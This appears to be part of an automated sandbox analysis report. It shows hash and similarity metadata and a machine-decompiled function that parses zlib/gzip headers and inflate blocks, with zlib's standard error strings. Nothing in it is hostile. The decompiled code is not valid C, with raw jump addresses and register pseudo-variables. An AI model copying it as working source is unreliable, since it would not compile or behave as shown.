                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735c40000_PAP46E1UkZ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: $header crc mismatch$unknown compression method$unknown header flags set
                                                                                                                                                                                                                              • API String ID: 0-4074041902
                                                                                                                                                                                                                              • Opcode ID: dd06c88064e64fce8aef997edd238926f7bb9caba3187585c53702fe67d40a3f
                                                                                                                                                                                                                              • Instruction ID: 3b3cd524d3e477e1b4399d2965da2d3343f3ef45644bbdc6c48f8c24909c9043
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: dd06c88064e64fce8aef997edd238926f7bb9caba3187585c53702fe67d40a3f
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F7F1A2B36183E756E7A6AF04C088E3ABBEAFF44B48F454538DA4907790DB38D941D750
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF735C476CD Relevance: 4.0, Strings: 3, Instructions: 219COMMONCrypto
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              C-Code - Quality: 73%
                                                                                                                                                                                                                              			E00007FF77FF735C476CD(signed int __ebx, void* __edi, void* __ebp, signed char* __rsi, signed long long __r8, void* __r9, void* __r11, signed long long __r12, void* __r13, void* __r14, long long __r15) {
				signed int _t550;
				signed int _t587;
				signed int _t597;
				signed int _t598;
				signed int _t609;
				void* _t610;
				signed int _t630;
				signed int _t633;
				unsigned int _t635;
				unsigned int _t639;
				signed int _t655;
				signed int _t657;
				signed int _t664;
				signed char _t669;
				signed int _t682;
				signed char _t687;
				unsigned int _t694;
				void* _t695;
				signed int _t704;
				signed int _t718;
				signed int _t729;
				signed int _t731;
				signed int _t733;
				signed int _t735;
				signed int _t737;
				signed int _t739;
				signed int _t741;
				signed int _t742;
				void* _t743;
				signed int _t746;
				signed int _t747;
				signed int _t748;
				signed int _t750;
				void* _t751;
				signed int _t752;
				void* _t753;
				signed int _t754;
				void* _t755;
				signed int _t756;
				void* _t757;
				signed int _t759;
				signed int _t760;
				void* _t761;
				signed int _t763;
				signed int _t764;
				void* _t765;
				signed int _t767;
				void* _t768;
				signed int _t769;
				signed int _t770;
				void* _t771;
				signed int _t773;
				void* _t774;
				signed int _t775;
				signed int _t777;
				signed int _t778;
				signed char _t788;
				signed int _t792;
				signed char _t804;
				signed char _t822;
				signed char _t825;
				signed int _t827;
				signed char _t828;
				signed int _t832;
				signed char _t849;
				signed char _t853;
				signed char _t883;
				signed char _t886;
				signed char _t892;
				signed char _t916;
				signed char _t919;
				signed char _t925;
				void* _t927;
				intOrPtr _t928;
				void* _t932;
				signed int _t943;
				signed char _t948;
				signed int _t964;
				signed char _t969;
				void* _t971;
				void* _t975;
				void* _t979;
				signed char _t991;
				signed char _t996;
				signed int _t998;
				void* _t1000;
				void* _t1001;
				void* _t1002;
				void* _t1003;
				signed char _t1004;
				void* _t1005;
				void* _t1006;
				void* _t1007;
				void* _t1008;
				void* _t1009;
				intOrPtr _t1010;
				void* _t1011;
				void* _t1012;
				void* _t1013;
				void* _t1014;
				void* _t1015;
				void* _t1016;
				void* _t1017;
				intOrPtr _t1018;
				intOrPtr _t1019;
				void* _t1020;
				void* _t1021;
				void* _t1022;
				void* _t1023;
				void* _t1024;
				void* _t1025;
				void* _t1026;
				void* _t1028;
				unsigned int _t1031;
				unsigned int _t1032;
				signed int _t1037;
				unsigned int _t1038;
				signed int _t1039;
				unsigned int _t1040;
				signed int _t1042;
				unsigned int _t1043;
				signed char _t1045;
				signed int _t1049;
				signed int _t1054;
				unsigned int _t1055;
				unsigned int _t1058;
				unsigned int _t1059;
				signed int _t1061;
				signed int _t1062;
				signed int _t1063;
				signed int _t1064;
				unsigned int _t1065;
				unsigned int _t1067;
				unsigned int _t1072;
				unsigned int _t1075;
				unsigned int _t1078;
				signed int _t1081;
				unsigned int _t1082;
				unsigned int _t1085;
				signed int _t1087;
				unsigned int _t1088;
				signed int _t1091;
				unsigned int _t1092;
				signed int _t1094;
				unsigned int _t1095;
				signed int* _t1116;
				intOrPtr _t1137;
				intOrPtr _t1166;
				void* _t1182;
				void* _t1217;
				void* _t1229;
				intOrPtr _t1302;
				intOrPtr _t1308;
				intOrPtr _t1310;
				intOrPtr _t1311;
				intOrPtr _t1312;
				intOrPtr _t1313;
				intOrPtr _t1314;
				intOrPtr _t1315;
				intOrPtr _t1317;
				signed long long _t1322;
				signed int _t1323;
				signed long long _t1326;
				signed long long _t1327;
				signed int _t1330;
				signed long long _t1334;
				signed long long _t1336;
				signed long long _t1339;
				void* _t1342;
				intOrPtr _t1344;
				void* _t1345;
				signed long long _t1349;
				signed long long _t1350;
				signed long long _t1351;
				signed long long _t1353;
				signed long long _t1354;
				signed long long _t1355;
				void* _t1356;
				signed int* _t1358;
				intOrPtr _t1363;
				intOrPtr _t1366;
				intOrPtr _t1368;
				signed char* _t1369;
				signed char* _t1386;
				signed char* _t1387;
				signed char* _t1388;
				signed char* _t1389;
				signed char* _t1390;
				signed char* _t1391;
				signed char* _t1392;
				signed char* _t1393;
				signed char* _t1394;
				signed char* _t1395;
				signed char* _t1396;
				signed char* _t1398;
				signed char* _t1399;
				signed char* _t1400;
				signed char* _t1401;
				signed char* _t1402;
				signed char* _t1403;
				signed char* _t1405;
				signed char* _t1406;
				signed char* _t1407;
				signed char* _t1408;
				signed char* _t1409;
				signed char* _t1410;
				signed char* _t1411;
				signed char* _t1412;
				void* _t1415;
				void* _t1417;
				signed long long _t1419;
				intOrPtr _t1421;
				char* _t1428;
				char* _t1429;
				long long _t1430;
				intOrPtr _t1431;
				signed int _t1432;
				signed int _t1433;
				intOrPtr _t1434;
				void* _t1435;
				signed long long _t1436;
				long long _t1443;

				_t1436 = __r12;
				_t1435 = __r11;
				_t1419 = __r8;
				_t948 =  *(__r13 + 0x10);
				if (_t948 != 0) goto 0x35c476e2;
				 *(__r13 + 8) = 0x3f40;
				goto 0x35c47d61;
				if (__ebx - 0x10 >= 0) goto 0x35c47705;
				if (__edi == 0) goto 0x35c47eff;
				_t1000 = __edi - 1;
				_t1386 =  &(__rsi[1]);
				if (__ebx + 8 - 0x10 < 0) goto 0x35c476e7;
				if ((_t948 & 0x00000002) == 0) goto 0x35c47763;
				if (__ebp + (( *__rsi & 0x000000ff) << __ebx) != 0x8b1f) goto 0x35c47763;
				if ( *(__r13 + 0x30) != 0) goto 0x35c47721;
				 *(__r13 + 0x30) = 0xf;
				r8d = 0;
				 *(__r13 + 0x20) = E00007FF77FF735C49520(_t1356);
				 *(_t1417 + 0x30) = 0x8b1f;
				r8d = 2;
				 *(__r13 + 0x20) = E00007FF77FF735C49520(_t1417 + 0x30);
				_t1031 = r15d;
				 *(__r13 + 8) = 0x3f35;
				goto 0x35c47d54;
				_t1302 =  *((intOrPtr*)(__r13 + 0x28));
				 *(__r13 + 0x18) = r15d;
				if (_t1302 == 0) goto 0x35c4777b;
				 *(_t1302 + 0x40) = 0xffffffff;
				if (( *(__r13 + 0x10) & 0x00000001) == 0) goto 0x35c4784b;
				if (((bpl & 0xffffffff) << 8) + (_t1031 >> 8) != ((((bpl & 0xffffffff) << 8) + (_t1031 >> 8) - (0x8421085 * (((bpl & 0xffffffff) << 8) + (_t1031 >> 8)) >> 0x20) >> 1) + (0x8421085 * (((bpl & 0xffffffff) << 8) + (_t1031 >> 8)) >> 0x20) >> 4) * 0x1f) goto 0x35c4784b;
				if ((_t1031 & 0x0000000f) == 8) goto 0x35c477d0;
				 *(__r12 + 0x20) = "unknown compression method";
				 *(__r13 + 8) = 0x3f51;
				goto 0x35c47d61;
				_t1032 = _t1031 >> 4;
				_t788 = (_t1032 & 0x0000000f) + 8;
				if ( *(__r13 + 0x30) != 0) goto 0x35c477ec;
				 *(__r13 + 0x30) = _t788;
				if (_t788 - 0xf > 0) goto 0x35c47832;
				if (_t788 - _t788 > 0) goto 0x35c47832;
				r8d = 0;
				 *(__r13 + 0x1c) = 1 << _t788;
				_t550 = E00007FF77FF735C49230(0, "unknown compression method", _t1417 + 0x30, __r8, __r9);
				_t729 = r15d;
				 *(__r13 + 0x20) = _t550;
				 *(__r12 + 0x4c) = _t550;
				 *(__r13 + 8) =  !(_t1032 >> 8) & 0x00000002 | 0x00003f3d;
				_t1037 = r15d;
				goto 0x35c47d54;
				 *(__r12 + 0x20) = "invalid window size";
				 *(__r13 + 8) = 0x3f51;
				goto 0x35c47d61;
				 *(__r12 + 0x20) = "incorrect header check";
				 *(__r13 + 8) = 0x3f51;
				if (_t729 - 0x10 >= 0) goto 0x35c4788e;
				if (_t1000 == 0) goto 0x35c47eff;
				_t1001 = _t1000 - 1;
				_t1038 = _t1037 + (( *_t1386 & 0x000000ff) << _t729);
				_t1387 =  &(_t1386[1]);
				if (_t729 + 8 - 0x10 < 0) goto 0x35c47870;
				 *(__r13 + 0x18) = _t1038;
				if (bpl == 8) goto 0x35c478b1;
				 *(__r12 + 0x20) = "unknown compression method";
				 *(__r13 + 8) = 0x3f51;
				goto 0x35c47d61;
				if ((_t1038 & 0x0000e000) == 0) goto 0x35c478d2;
				 *(__r12 + 0x20) = "unknown header flags set";
				 *(__r13 + 8) = 0x3f51;
				goto 0x35c47d61;
				_t1358 =  *((intOrPtr*)(__r13 + 0x28));
				_t792 = _t1038 >> 8;
				_t1116 = _t1358;
				if (_t1116 == 0) goto 0x35c478ed;
				 *_t1358 = _t792 & 0x00000001;
				asm("bt eax, 0x9");
				if (_t1116 >= 0) goto 0x35c4791b;
				if (( *(__r13 + 0x10) & 0x00000004) == 0) goto 0x35c4791b;
				 *(_t1417 + 0x30) = bpl;
				 *(_t1417 + 0x31) = _t792;
				r8d = 2;
				 *(__r13 + 0x20) = E00007FF77FF735C49520(_t1417 + 0x30);
				_t1039 = r15d;
				 *(__r13 + 8) = 0x3f36;
				_t731 = r15d;
				if (_t731 - 0x20 >= 0) goto 0x35c4794e;
				if (_t1001 == 0) goto 0x35c47eff;
				_t1002 = _t1001 - 1;
				_t1040 = _t1039 + (( *_t1387 & 0x000000ff) << _t731);
				_t1388 =  &(_t1387[1]);
				if (_t731 + 8 - 0x20 < 0) goto 0x35c47930;
				_t1308 =  *((intOrPtr*)(__r13 + 0x28));
				if (_t1308 == 0) goto 0x35c4795a;
				 *(_t1308 + 4) = _t1040;
				if (( *(__r13 + 0x18) & 0x00000200) == 0) goto 0x35c479a2;
				if (( *(__r13 + 0x10) & 0x00000004) == 0) goto 0x35c479a2;
				 *(_t1417 + 0x30) = bpl;
				 *(_t1417 + 0x31) = _t1040 >> 8;
				r8d = 4;
				 *((char*)(_t1417 + 0x32)) = _t1040 >> 0x10;
				 *(_t1417 + 0x33) = bpl;
				 *(__r13 + 0x20) = E00007FF77FF735C49520(_t1417 + 0x30);
				_t1042 = r15d;
				 *(__r13 + 8) = 0x3f37;
				_t733 = r15d;
				if (_t733 - 0x10 >= 0) goto 0x35c479d5;
				if (_t1002 == 0) goto 0x35c47eff;
				_t1003 = _t1002 - 1;
				_t1043 = _t1042 + (( *_t1388 & 0x000000ff) << _t733);
				_t1389 =  &(_t1388[1]);
				if (_t733 + 8 - 0x10 < 0) goto 0x35c479b7;
				_t1344 =  *((intOrPtr*)(__r13 + 0x28));
				if (_t1344 == 0) goto 0x35c479f3;
				 *(_t1344 + 8) = bpl & 0xffffffff;
				 *( *((intOrPtr*)(__r13 + 0x28)) + 0xc) = _t1043 >> 8;
				goto 0x35c479f8;
				if (( *(__r13 + 0x18) & 0x00000200) == 0) goto 0x35c47a2a;
				if (( *(__r13 + 0x10) & 0x00000004) == 0) goto 0x35c47a2a;
				 *(_t1417 + 0x30) = bpl;
				 *(_t1417 + 0x31) = _t1043 >> 8;
				r8d = 2;
				 *(__r13 + 0x20) = E00007FF77FF735C49520(_t1417 + 0x30);
				 *(__r13 + 8) = 0x3f38;
				_t735 = r15d;
				if (( *(__r13 + 0x18) & 0x00000400) == 0) goto 0x35c47ab3;
				if (_t735 - 0x10 >= 0) goto 0x35c47a65;
				if (_t1003 == 0) goto 0x35c47eff;
				_t1004 = _t1003 - 1;
				_t1045 = r15d + (( *_t1389 & 0x000000ff) << _t735);
				_t1390 =  &(_t1389[1]);
				if (_t735 + 8 - 0x10 < 0) goto 0x35c47a47;
				_t1310 =  *((intOrPtr*)(__r13 + 0x28));
				 *(__r13 + 0x50) = _t1045;
				if (_t1310 == 0) goto 0x35c47a75;
				 *(_t1310 + 0x18) = _t1045;
				if (( *(__r13 + 0x18) & 0x00000200) == 0) goto 0x35c47aab;
				if (( *(__r13 + 0x10) & 0x00000004) == 0) goto 0x35c47aab;
				 *(_t1417 + 0x30) = bpl;
				r8d = 2;
				 *(_t1417 + 0x31) = bpl;
				 *(__r13 + 0x20) = E00007FF77FF735C49520(_t1417 + 0x30);
				_t737 = r15d;
				goto 0x35c47ac0;
				_t1311 =  *((intOrPtr*)(__r13 + 0x28));
				_t1137 = _t1311;
				if (_t1137 == 0) goto 0x35c47ac0;
				 *((long long*)(_t1311 + 0x10)) = __r15;
				 *(__r13 + 8) = 0x3f39;
				asm("bt eax, 0xa");
				if (_t1137 >= 0) goto 0x35c47b66;
				_t804 =  *(__r13 + 0x50);
				r14d = _t1004;
				r14d =  <=  ? _t804 : r14d;
				if (r14d == 0) goto 0x35c47b5e;
				_t1363 =  *((intOrPtr*)(__r13 + 0x28));
				if (_t1363 == 0) goto 0x35c47b2d;
				_t1431 =  *((intOrPtr*)(_t1363 + 0x10));
				if (_t1431 == 0) goto 0x35c47b2d;
				r8d =  *(_t1363 + 0x1c);
				r9d =  *(_t1363 + 0x18);
				r9d = r9d - _t804;
				_t574 =  >  ? r8d - r9d : r14d;
				_t1345 = _t1344 + _t1431;
				r8d =  >  ? r8d - r9d : r14d;
				E00007FF77FF735C4B150();
				asm("bt eax, 0x9");
				if (__r14 + __r9 - r8d >= 0) goto 0x35c47b4d;
				if (( *(__r13 + 0x10) & 0x00000004) == 0) goto 0x35c47b4d;
				r8d = r14d;
				 *(__r13 + 0x20) = E00007FF77FF735C49520(_t1390);
				_t1005 = _t1004 - r14d;
				_t1391 =  &(_t1390[_t1311]);
				 *(__r13 + 0x50) =  *(__r13 + 0x50) - r14d;
				if ( *(__r13 + 0x50) != 0) goto 0x35c47eff;
				 *(__r13 + 0x50) = r15d;
				 *(__r13 + 8) = 0x3f3a;
				if (( *(__r13 + 0x18) & 0x00000800) == 0) goto 0x35c47c03;
				if (_t1005 == 0) goto 0x35c47eff;
				r14d = r15d;
				r14d = r14d + 1;
				r15d =  *(_t1311 + _t1391) & 0x000000ff;
				_t1312 =  *((intOrPtr*)(__r13 + 0x28));
				if (_t1312 == 0) goto 0x35c47bbe;
				_t1366 =  *((intOrPtr*)(_t1312 + 0x20));
				if (_t1366 == 0) goto 0x35c47bbe;
				if ( *(__r13 + 0x50) -  *((intOrPtr*)(_t1312 + 0x28)) >= 0) goto 0x35c47bbe;
				 *((intOrPtr*)(_t1345 + _t1366)) = r15b;
				 *(__r13 + 0x50) =  *(__r13 + 0x50) + 1;
				if (r15b == 0) goto 0x35c47bc8;
				if (r14d - _t1005 < 0) goto 0x35c47b90;
				if (( *(__r13 + 0x18) & 0x00000200) == 0) goto 0x35c47bec;
				if (( *(__r13 + 0x10) & 0x00000004) == 0) goto 0x35c47bec;
				r8d = r14d;
				 *(__r13 + 0x20) = E00007FF77FF735C49520(_t1391);
				_t1006 = _t1005 - r14d;
				_t1392 =  &(_t1391[_t1312]);
				if (r15b != 0) goto 0x35c47eff;
				r15d = 0;
				goto 0x35c47c10;
				_t1313 =  *((intOrPtr*)(__r13 + 0x28));
				if (_t1313 == 0) goto 0x35c47c10;
				 *((long long*)(_t1313 + 0x20)) = __r15;
				 *(__r13 + 0x50) = r15d;
				 *(__r13 + 8) = 0x3f3b;
				if (( *(__r13 + 0x18) & 0x00001000) == 0) goto 0x35c47ca4;
				if (_t1006 == 0) goto 0x35c47eff;
				r14d = r15d;
				r14d = r14d + 1;
				r15d =  *(_t1313 + _t1392) & 0x000000ff;
				_t1314 =  *((intOrPtr*)(__r13 + 0x28));
				if (_t1314 == 0) goto 0x35c47c5f;
				_t1368 =  *((intOrPtr*)(_t1314 + 0x30));
				if (_t1368 == 0) goto 0x35c47c5f;
				if ( *(__r13 + 0x50) -  *((intOrPtr*)(_t1314 + 0x38)) >= 0) goto 0x35c47c5f;
				 *((intOrPtr*)(_t1345 + _t1368)) = r15b;
				 *(__r13 + 0x50) =  *(__r13 + 0x50) + 1;
				if (r15b == 0) goto 0x35c47c69;
				if (r14d - _t1006 < 0) goto 0x35c47c31;
				if (( *(__r13 + 0x18) & 0x00000200) == 0) goto 0x35c47c8d;
				if (( *(__r13 + 0x10) & 0x00000004) == 0) goto 0x35c47c8d;
				r8d = r14d;
				_t1369 = _t1392;
				 *(__r13 + 0x20) = E00007FF77FF735C49520(_t1369);
				_t1007 = _t1006 - r14d;
				_t1393 =  &(_t1392[_t1314]);
				if (r15b != 0) goto 0x35c47eff;
				r15d = 0;
				goto 0x35c47cb1;
				_t1315 =  *((intOrPtr*)(__r13 + 0x28));
				_t1166 = _t1315;
				if (_t1166 == 0) goto 0x35c47cb1;
				 *((long long*)(_t1315 + 0x30)) = __r15;
				r10d =  *(_t1417 + 0xb8);
				 *(__r13 + 8) = 0x3f3c;
				asm("bt edx, 0x9");
				if (_t1166 >= 0) goto 0x35c47d1a;
				if (_t737 - 0x10 >= 0) goto 0x35c47cee;
				if (_t1007 == 0) goto 0x35c47eff;
				_t1008 = _t1007 - 1;
				_t1394 =  &(_t1393[1]);
				if (_t737 + 8 - 0x10 < 0) goto 0x35c47cd0;
				if (( *(__r13 + 0x10) & 0x00000004) == 0) goto 0x35c47d14;
				if (r15d + (( *_t1393 & 0x000000ff) << _t737) == ( *(__r13 + 0x20) & 0x0000ffff)) goto 0x35c47d14;
				 *(__r12 + 0x20) = "header crc mismatch";
				 *(__r13 + 8) = 0x3f51;
				goto 0x35c47d5c;
				_t1049 = r15d;
				_t739 = r15d;
				_t1317 =  *((intOrPtr*)(__r13 + 0x28));
				if (_t1317 == 0) goto 0x35c47d37;
				 *(_t1317 + 0x3c) =  *(__r13 + 0x18) >> 0x00000009 & 0x00000001;
				_t1318 =  *((intOrPtr*)(__r13 + 0x28));
				 *( *((intOrPtr*)(__r13 + 0x28)) + 0x40) = 1;
				r8d = 0;
				_t587 = E00007FF77FF735C49520(_t1369);
				 *(__r13 + 0x20) = _t587;
				 *(__r12 + 0x4c) = _t587;
				 *(__r13 + 8) = 0x3f3f;
				r10d =  *(_t1417 + 0xb8);
				_t1421 =  *((intOrPtr*)(_t1417 + 0x40));
				_t186 = _t1369 - 0x3f34; // 0x14
				if (_t186 - 0x1f > 0) goto 0x35c48d65;
				r8d =  *(_t1417 + 0xa0);
				r15d = 0;
				r14d =  *(_t1417 + 0xa8);
				if (_t739 - 0x20 >= 0) goto 0x35c47daf;
				if (_t1008 == 0) goto 0x35c47eff;
				_t1009 = _t1008 - 1;
				_t1395 =  &(_t1394[1]);
				if (_t739 + 8 - 0x20 < 0) goto 0x35c47d91;
				_t741 = r15d;
				_t597 = (_t1049 + (( *_t1394 & 0x000000ff) << _t739) >> 0x00000008 & 0x0000ff00) + ((_t1049 + (( *_t1394 & 0x000000ff) << _t739) & 0x0000ff00) + (_t1049 + (( *_t1394 & 0x000000ff) << _t739) << 0x10) << 8) + (_t1049 + (( *_t1394 & 0x000000ff) << _t739) >> 0x18);
				 *(__r13 + 0x20) = _t597;
				 *(__r12 + 0x4c) = _t597;
				 *(__r13 + 8) = 0x3f3e;
				if ( *((intOrPtr*)(__r13 + 0x14)) == 0) goto 0x35c48c20;
				r8d = 0;
				_t598 = E00007FF77FF735C49230(0, _t1318, _t1369, __r8, _t1421);
				r10d =  *(_t1417 + 0xb8);
				 *(__r13 + 0x20) = _t598;
				 *(__r12 + 0x4c) = _t598;
				 *(__r13 + 8) = 0x3f3f;
				if (__r14 - 5 - 1 <= 0) goto 0x35c47eff;
				if ( *(__r13 + 0xc) == 0) goto 0x35c47e43;
				 *(__r13 + 8) = 0x3f4e;
				_t822 = _t741 & 0x00000007;
				_t742 = _t741 - _t822;
				goto 0x35c47d5c;
				if (_t742 - 3 >= 0) goto 0x35c47e66;
				if (_t1009 == 0) goto 0x35c47eff;
				_t1010 = _t1009 - 1;
				_t1054 = (r15d >> _t822) + (( *_t1395 & 0x000000ff) << _t742);
				_t1396 =  &(_t1395[1]);
				_t743 = _t742 + 8;
				_t1182 = _t743 - 3;
				if (_t1182 < 0) goto 0x35c47e48;
				_t1055 = _t1054 >> 1;
				 *(__r13 + 0xc) = _t1054 & 0x00000001;
				if (_t1182 == 0) goto 0x35c47f9d;
				if (_t1182 == 0) goto 0x35c47ec1;
				if (_t1182 == 0) goto 0x35c47eae;
				if ((_t1055 & 0x00000003) != 1) goto 0x35c47fa5;
				 *(__r12 + 0x20) = "invalid block type";
				 *(__r13 + 8) = 0x3f51;
				goto 0x35c47d5c;
				 *(__r13 + 8) = 0x3f44;
				goto 0x35c47d5c;
				 *(__r13 + 0x70) = 9;
				 *(__r13 + 0x60) = 0x35c6bcb0;
				 *((long long*)(__r13 + 0x68)) = 0x35c6c4b0;
				 *((intOrPtr*)(__r13 + 0x74)) = 5;
				 *(__r13 + 8) = 0x3f47;
				if (r14d != 6) goto 0x35c47fa5;
				_t1058 = _t1055 >> 2 >> 2 >> 2;
				_t746 = _t743 + 0x2fffffff7;
				r14d =  *(_t1417 + 0xa0);
				r15d =  *(_t1417 + 0xb0);
				 *((long long*)(__r12 + 0x10)) =  *((intOrPtr*)(_t1417 + 0x40));
				 *(__r12 + 0x18) =  *(_t1417 + 0xb8);
				 *__r12 = _t1396;
				 *((intOrPtr*)(__r12 + 8)) = _t1010;
				 *(__r13 + 0x48) = _t1058;
				 *(__r13 + 0x4c) = _t746;
				if ( *((intOrPtr*)(__r13 + 0x34)) != 0) goto 0x35c47f6e;
				if (r14d ==  *(__r12 + 0x18)) goto 0x35c48c91;
				_t609 =  *(__r13 + 8);
				if (_t609 - 0x3f51 >= 0) goto 0x35c48c91;
				if (_t609 - 0x3f4e < 0) goto 0x35c47f6e;
				if ( *(_t1417 + 0xa8) == 4) goto 0x35c48c91;
				r8d = r14d;
				r8d = r8d -  *(__r12 + 0x18);
				_t610 = E00007FF77FF735C49120(0x35c6c4b0, _t1342, __r12,  *((intOrPtr*)(__r12 + 0x10)), _t1415); // executed
				if (_t610 == 0) goto 0x35c48c91;
				 *(__r13 + 8) = 0x3f52;
				goto 0x35c48d6a;
				 *(__r13 + 8) = 0x3f41;
				_t1059 = _t1058 >> 2;
				_t747 = _t746 + 0xfffffffd;
				_t825 = _t747 & 0x00000007;
				_t748 = _t747 - _t825;
				if (_t748 - 0x20 >= 0) goto 0x35c47fde;
				if (_t1010 == 0) goto 0x35c47eff;
				_t1011 = _t1010 - 1;
				_t1061 = (_t1059 >> _t825) + (( *_t1396 & 0x000000ff) << _t748);
				if (_t748 + 8 - 0x20 < 0) goto 0x35c47fc0;
				_t827 = _t1061 & 0x0000ffff;
				if (_t827 ==  !_t1061 >> 0x10) goto 0x35c48005;
				_t1322 = "invalid stored block lengths";
				 *(__r12 + 0x20) = _t1322;
				 *(__r13 + 8) = 0x3f51;
				goto 0x35c47d61;
				 *(__r13 + 0x50) = _t827;
				_t1062 = r15d;
				 *(__r13 + 8) = 0x3f42;
				_t750 = r15d;
				if (r14d == 6) goto 0x35c47eff;
				 *(__r13 + 8) = 0x3f43;
				_t828 =  *(__r13 + 0x50);
				if (_t828 == 0) goto 0x35c4808b;
				r14d = r10d;
				_t618 =  <=  ? _t828 : _t1011;
				r14d =  <=  ?  <=  ? _t828 : _t1011 : r14d;
				if (r14d == 0) goto 0x35c47eff;
				r8d = r14d;
				E00007FF77FF735C4B150();
				r10d =  *(_t1417 + 0xb8);
				_t1012 = _t1011 - r14d;
				r10d = r10d - r14d;
				 *(_t1417 + 0xb8) = r10d;
				_t1398 =  &(( &(_t1396[1]))[_t1322]);
				 *((long long*)(_t1417 + 0x40)) =  *((intOrPtr*)(_t1417 + 0x40)) + _t1322;
				 *(__r13 + 0x50) =  *(__r13 + 0x50) - r14d;
				goto 0x35c47d61;
				 *(__r13 + 8) = 0x3f3f;
				if (_t750 - 0xe >= 0) goto 0x35c480be;
				if (_t1012 == 0) goto 0x35c47eff;
				_t1013 = _t1012 - 1;
				_t1063 = _t1062 + (( *_t1398 & 0x000000ff) << _t750);
				_t1399 =  &(_t1398[1]);
				_t751 = _t750 + 8;
				if (_t751 - 0xe < 0) goto 0x35c480a0;
				_t752 = _t751 + 0xfffffff2;
				_t1064 = _t1063 >> 5;
				_t832 = (_t1063 & 0x0000001f) + 0x101;
				_t1065 = _t1064 >> 5;
				 *(__r13 + 0x7c) = _t832;
				_t964 = (_t1064 & 0x0000001f) + 1;
				 *(__r13 + 0x80) = _t964;
				 *((intOrPtr*)(__r13 + 0x78)) = (_t1065 & 0x0000000f) + 4;
				if (_t832 - 0x11e > 0) goto 0x35c48220;
				if (_t964 - 0x1e > 0) goto 0x35c48220;
				 *(__r13 + 0x84) = r15d;
				 *(__r13 + 8) = 0x3f45;
				if ( *(__r13 + 0x84) -  *((intOrPtr*)(__r13 + 0x78)) >= 0) goto 0x35c48188;
				if (_t752 - 3 >= 0) goto 0x35c4814e;
				if (_t1013 == 0) goto 0x35c47eff;
				_t1014 = _t1013 - 1;
				_t1067 = (_t1065 >> 4) + (( *_t1399 & 0x000000ff) << _t752);
				_t1400 =  &(_t1399[1]);
				_t753 = _t752 + 8;
				if (_t753 - 3 < 0) goto 0x35c48130;
				_t754 = _t753 + 0xfffffffd;
				 *(__r13 + 0x90 + _t1322 * 2) = _t1067 & 7;
				 *(__r13 + 0x84) =  *(__r13 + 0x84) + 1;
				_t630 =  *(__r13 + 0x84);
				if (_t630 -  *((intOrPtr*)(__r13 + 0x78)) < 0) goto 0x35c48124;
				if (_t630 - 0x13 >= 0) goto 0x35c481ba;
				 *(__r13 + 0x90 + _t1322 * 2) = r15w;
				 *(__r13 + 0x84) =  *(__r13 + 0x84) + 1;
				if ( *(__r13 + 0x84) - 0x13 < 0) goto 0x35c48190;
				_t1349 = __r13 + 0x70;
				_t1323 = __r13 + 0x550;
				 *_t1349 = 7;
				 *(__r13 + 0x60) = _t1323;
				 *(__r13 + 0x88) = _t1323;
				 *((long long*)(_t1417 + 0x28)) = __r13 + 0x310;
				 *(_t1417 + 0x20) = _t1349;
				_t275 = _t1349 + 0x13; // 0x13
				r8d = _t275;
				_t633 = E00007FF77FF735C49860(0, __r13 + 0x90, _t1415, __r13 + 0x88, __r12);
				 *(_t1417 + 0xb0) = _t633;
				if (_t633 == 0) goto 0x35c48239;
				 *(_t1436 + 0x20) = "invalid code lengths set";
				 *(__r13 + 8) = 0x3f51;
				goto 0x35c47d54;
				_t1326 = "too many length or distance symbols";
				 *(_t1436 + 0x20) = _t1326;
				 *(__r13 + 8) = 0x3f51;
				goto 0x35c47d61;
				 *(__r13 + 0x84) = r15d;
				 *(__r13 + 8) = 0x3f46;
				r10d =  *(__r13 + 0x7c);
				if ( *(__r13 + 0x84) -  *(__r13 + 0x80) + r10d >= 0) goto 0x35c48462;
				r9d = 1;
				_t1432 =  *(__r13 + 0x60);
				r9d = r9d <<  *(__r13 + 0x70);
				r9d = r9d - 1;
				_t1350 = _t1349 & _t1326;
				_t635 =  *(_t1432 + _t1350 * 4);
				r8d = _t635;
				r8d = r8d >> 0x10;
				 *(_t1417 + 0x34) = _t635;
				if ((_t635 >> 0x00000008 & 0x000000ff) - _t754 <= 0) goto 0x35c482e3;
				if (_t1014 == 0) goto 0x35c47eff;
				_t1015 = _t1014 - 1;
				_t1401 =  &(_t1400[1]);
				_t755 = _t754 + 8;
				_t1327 = _t1326 & _t1350;
				_t639 =  *(_t1432 + _t1327 * 4);
				_t969 = _t639 >> 8;
				r8d = _t639;
				r8d = r8d >> 0x10;
				 *(_t1417 + 0x34) = _t639;
				if ((_t969 & 0x000000ff) - _t755 > 0) goto 0x35c482a7;
				_t1217 = r8w - 0x10;
				if (_t1217 >= 0) goto 0x35c4831a;
				_t756 = _t755 - (_t969 & 0x000000ff);
				 *((short*)(__r13 + 0x90 + _t1350 * 2)) = _t639 >> 0x10;
				 *(__r13 + 0x84) =  *(__r13 + 0x84) + 1;
				r8d =  *(__r13 + 0x84);
				goto 0x35c48447;
				if (_t1217 != 0) goto 0x35c48379;
				_t971 = (_t969 & 0x000000ff) + 2;
				if (_t756 - _t971 >= 0) goto 0x35c48343;
				if (_t1015 == 0) goto 0x35c47eff;
				_t1016 = _t1015 - 1;
				_t1402 =  &(_t1401[1]);
				_t757 = _t756 + 8;
				if (_t757 - _t971 < 0) goto 0x35c48326;
				_t849 =  *(_t1417 + 0x35) & 0x000000ff;
				_t1072 = ((_t1067 >> 3) + (( *_t1400 & 0x000000ff) << _t754) >> (_t969 & 0x000000ff)) + (( *_t1401 & 0x000000ff) << _t756) >> _t849;
				if ( *(__r13 + 0x84) == 0) goto 0x35c48492;
				_t759 = _t757 - _t849 + 0xfffffffe;
				r9d =  *(__r13 + 0x90 + _t1327 * 2) & 0x0000ffff;
				goto 0x35c48403;
				if (r8w != 0x11) goto 0x35c483c0;
				_t975 = (_t1072 & 0x00000003) + 6;
				if (_t759 - _t975 >= 0) goto 0x35c483a4;
				if (_t1016 == 0) goto 0x35c47eff;
				_t1017 = _t1016 - 1;
				_t1403 =  &(_t1402[1]);
				_t760 = _t759 + 8;
				if (_t760 - _t975 < 0) goto 0x35c48387;
